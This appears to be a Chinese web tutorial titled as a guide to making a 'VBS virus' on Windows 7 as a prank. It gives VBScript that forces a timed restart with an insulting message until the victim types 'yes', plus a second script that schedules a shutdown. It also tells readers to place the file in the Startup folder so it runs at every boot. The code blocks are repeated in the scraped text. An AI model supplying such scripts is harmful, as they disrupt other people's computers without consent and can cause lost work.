在平时的生活工作中,我们偶尔会无聊,因此就想搞点事情出来,于是有人就想制作vbs病毒,可是很多人不知道W7电脑系统怎么制作vbs病毒?为此小编赶紧整理了W7电脑系统制作vbs病毒教程,感兴趣的朋友可以来看看。
方法/步骤:
1、首先,打开记事本。
2、输入代码(整人级):
- 01dim WSHshellA
- 02set WSHshellA = wscript.createobject(“wscript.shell”)
- 03WSHshellA.run “cmd.exe /c shutdown -r -t 180 -c “”你就是笨蛋?”” “,0 ,true
- 04dim a
- 05do while(a <> “是”)
- 06a = inputbox (“说是,不说我就关你的机。不信?来试试。 “,”说不说”,”不是”,8000,7000)
- 07msgbox chr(13) + chr(13) + chr(13) + a,0,”MsgBox”
- 08loop
- 09msgbox chr(13) + chr(13) + chr(13) + “哈哈”
- 10dim WSHshell
- 11set WSHshell = wscript.createobject(“wscript.shell”)
- 12WSHshell.run “cmd.exe /c shutdown -a”,0 ,true
- 13msgbox chr(13) + chr(13) + chr(13) + “你被我耍了”
复制代码
dim WSHshellA
set WSHshellA = wscript.createobject(“wscript.shell”)
WSHshellA.run “cmd.exe /c shutdown -r -t 180 -c “”你就是笨蛋?”” “,0 ,true
dim a
do while(a <> “是”)
a = inputbox (“说是,不说我就关你的机。不信?来试试。 “,”说不说”,”不是”,8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,”MsgBox”
loop
msgbox chr(13) + chr(13) + chr(13) + “哈哈”
dim WSHshell
set WSHshell = wscript.createobject(“wscript.shell”)
WSHshell.run “cmd.exe /c shutdown -a”,0 ,true
msgbox chr(13) + chr(13) + chr(13) + “你被我耍了”
set WSHshellA = wscript.createobject(“wscript.shell”)
WSHshellA.run “cmd.exe /c shutdown -r -t 180 -c “”你就是笨蛋?”” “,0 ,true
dim a
do while(a <> “是”)
a = inputbox (“说是,不说我就关你的机。不信?来试试。 “,”说不说”,”不是”,8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,”MsgBox”
loop
msgbox chr(13) + chr(13) + chr(13) + “哈哈”
dim WSHshell
set WSHshell = wscript.createobject(“wscript.shell”)
WSHshell.run “cmd.exe /c shutdown -a”,0 ,true
msgbox chr(13) + chr(13) + chr(13) + “你被我耍了”
3、(中等):
- 01dim WSHshell
- 02set ws=wscript.createobject(“wscript.shell”)
- 03ws.run “shutdown -s -t 3600000”,0
复制代码
dim WSHshell
set ws=wscript.createobject(“wscript.shell”)
ws.run “shutdown -s -t 3600000”,0
set ws=wscript.createobject(“wscript.shell”)
ws.run “shutdown -s -t 3600000”,0
注:制作好的VBS需要放在启动项中:
WinXP C:\Documents and Settings\用户名\「开始」菜单\程序\启动
w7 C:\Documents and Settings\Administrator\「开始」菜单\程序\启动
Win8 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
或者 C:\ProgramData\Microsoft\Windows\开始菜单\程序\启动
W10 C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
4、保存:按下Ctrl+S快捷键,在弹出的窗口中选择文件类型:所有文件(*.*),在文件名处输入文件名,在文件名后面输入“.vbs”或“.vbe”,保存。
注意事项:
这些代码仅用于整人,不可以利用这些代码做违法的事情!
以上就是W7电脑系统怎么制作vbs病毒的教程了,很简单吧,我们只需要新建记事本,之后粘贴文章的代码,最后保存为.vbs或者.vbe格式的文件即可。
评论前必须登录!
注册